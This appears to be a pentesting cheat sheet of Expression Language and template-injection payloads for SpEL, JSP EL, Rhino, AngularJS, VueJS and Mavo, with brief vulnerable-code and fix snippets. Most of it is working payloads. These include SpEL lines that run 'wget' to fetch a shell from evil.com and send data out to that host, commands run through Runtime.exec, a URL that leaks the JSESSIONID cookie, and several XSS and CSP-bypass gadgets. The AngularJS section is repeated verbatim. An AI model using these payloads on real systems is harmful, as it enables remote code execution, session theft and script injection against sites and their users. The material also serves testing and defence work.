Link to this headingExpression Language/Template Injection

Used in JSP2.0/2.1, Jakarta, OGNL, MVEL, SPEL

Example:

<c:out value="person.address.street"/>

Link to this headingSpring Expression Language (SpEL)

Echo Foo Parameter:

<spring:message scope="${param.foo}"/>

Testing:

${aaaa} ${"aaaa"} ${99999+1} T(java.lang.Runtime).getRuntime().exec("wget http://evil.com/shell.jsp") (new java.util.Scanner((T(java.lang.Runtime).getRuntime().exec("uname -a").getInputStream()),"UTF-8")).useDelimiter("\\A").next() new java.net.URL("http://evil.com/ex?data="+??).openConnection().getInputStream().readLine()

Data Leakage:

${applicationScope} ${requestScope} http:///vulnerable.com/spring/foo?param=${cookie["JSESSIONID"].value}

Link to this headingExample Vulnerable Code

ExpressionParser parser = new SpelExpressionParser(); StandardEvaluationContext testContext = new StandardEvaluationContext(TEST_PERSON); Expression exp = parser.parseExpression(dynamicValue); // name = 'Bob' String valueExtracted = exp.getValue(testContext, String.class);

Link to this headingHow to fix

Per page Fix:

<%@ page isELIgnored ="true" %>

Per App Fix:

<context-param> <description>Spring Expression Language Support</description> <param-name>springJspExpressionSupport</param-name> <param-value>false</param-value> </context-param>

Link to this headingScriptEngine / Rhino

Testing:

new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()

Link to this headingExample Vulnerable Code

Example1:

import org.mozilla.javascript.*; Context cx = Context.enter(); [...] cx.evaluateString(scope, dynamicCodeHere, "", 1, null);

Example1:

import javax.script.ScriptEngine; ScriptEngineManager scriptEngineManager = new ScriptEngineManager(); ScriptEngine scriptEngine = scriptEngineManager.getEngineByExtension("js"); Object result = scriptEngine.eval(dynamiceCodeHere);

Link to this headingJinja

Server-Side Template Injection

Link to this headingAngularJS

Examples:

{{$on.constructor('alert(1)')()}} {{constructor.constructor('alert(1)')()}} <input ng-focus=$event.view.alert('XSS')> <!-- Google Research - AngularJS --> <div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

Link to this headingAngularJS

Examples:

{{$on.constructor('alert(1)')()}} {{constructor.constructor('alert(1)')()}} <input ng-focus=$event.view.alert('XSS')> <!-- Google Research - AngularJS --> <div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

Link to this headingVueJS

Evading defences using VueJS script gadgets

Examples:

<!-- Google Research - Vue.js--> "><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

V3 Examples:

{{_openBlock.constructor('alert(1)')()}}

V2 Examples:

{{constructor.constructor('alert(1)')()}}

Link to this headingMavo

[7*7] [(1,alert)(1)] <div mv-expressions="{{ }}">{{top.alert(1)}}</div> [self.alert(1)] javascript:alert(1)%252f%252f..%252fcss-images [Omglol mod 1 mod self.alert (1) andlol] [''=''or self.alert(lol)] <a data-mv-if='1 or self.alert(1)'>test</a> <div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div> <a href=[javascript&':alert(1)']>test</a> [self.alert(1)mod1]